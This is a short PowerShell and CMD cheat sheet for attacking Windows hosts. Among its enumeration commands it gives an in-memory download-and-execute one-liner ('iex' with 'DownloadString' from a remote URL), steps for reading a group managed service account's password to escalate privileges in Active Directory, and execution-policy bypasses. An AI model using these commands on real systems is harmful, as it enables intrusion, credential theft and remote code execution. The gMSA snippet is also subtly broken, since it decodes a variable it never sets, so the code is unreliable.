CMD and Powershell

List hidden files

dir . -att h
dir -Force
ls -Hidden (-Directory/-File)

Basic enumeration

Get-LocalUser
Get-ChildItem env:
net user <user> /domain

Execute PowerShell Script in Memory

powershell –nop –c "iex(New-Object Net.WebClient).DownloadString('http://..../.ps1'')"

AD Privilege Escalation

Service Accounts

With PrincipalsAllowedToRetrieveManagedPassword:
Get-ADServiceAccount -Identity 'srv-acc-name' -Properties *
// see PrincipalsAllowedToRetrieveManagedPassword : {CN=GROUP,OU=Sites,DC=DOMAIN,DC=DOMAIN}
// if you are in {CN..} you can retrieve the password
$managedpass = (Get-ADServiceAccount -Identity 'srv-acc-name' -Properties msDS-managedPassword).'msDS-managedPassword'
// Use DSInternals module
$pass = (ConvertFrom-ADManagedPasswordBlob $encpass).SecureCurrentPassword
$cred = New-Object System.Management.Automation.PSCredential 'srv-acc-name', $pass
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}

Bypass PowerShell execution policy

Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
Set-ExecutionPolicy Bypass -Scope Process